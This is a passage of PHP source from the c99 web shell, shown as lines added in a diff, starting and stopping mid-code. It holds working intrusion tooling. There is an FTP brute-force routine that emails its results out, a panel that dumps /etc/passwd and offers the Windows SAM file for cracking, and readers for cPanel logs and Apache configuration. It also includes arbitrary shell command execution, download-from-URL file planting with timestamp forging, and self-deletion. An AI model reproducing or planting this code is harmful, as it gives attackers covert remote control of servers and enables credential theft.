+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form method=\"POST\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   //$ow = posix_getpwuid(fileowner($d));
+   //$gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form method=\"POST\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($uid["dir"])."';document.todo.submit();\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"#\" onclick=\"document.todo.act.value='security';document.todo.d.value='".$ud."';document.todo.nixpasswd.value='1';document.todo.submit();\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='sam';document.todo.d.value='".$_SERVER["WINDIR"]."\/repair';document.todo.ft.value='download';document.todo.submit();\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='userdomains';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='accounting.log';document.todo.d.value='".urlencode("/var/cpanel/")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/usr/local/apache/conf")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='syslog.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='motd';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='hosts';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form method=\"POST\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search")
+{
+ echo "<b>Search in file-system:</b><br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" method=POST><input type=\"hidden\" name=\"act\" value=\"upload\"><input type=\"hidden\" name=\"d\" value=\"".urlencode($d)."\">
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     //$ow = posix_getpwuid(fileowner($v));
+     //$gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$k.($parsesort[1] == "a"?"d":"a").";document.todo.submit();\">";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$i.$parsesort[1]."';document.todo.submit();\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>";         }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>";
+     }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+     $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\"><b>".view_perms_color($v)."</b></a>";
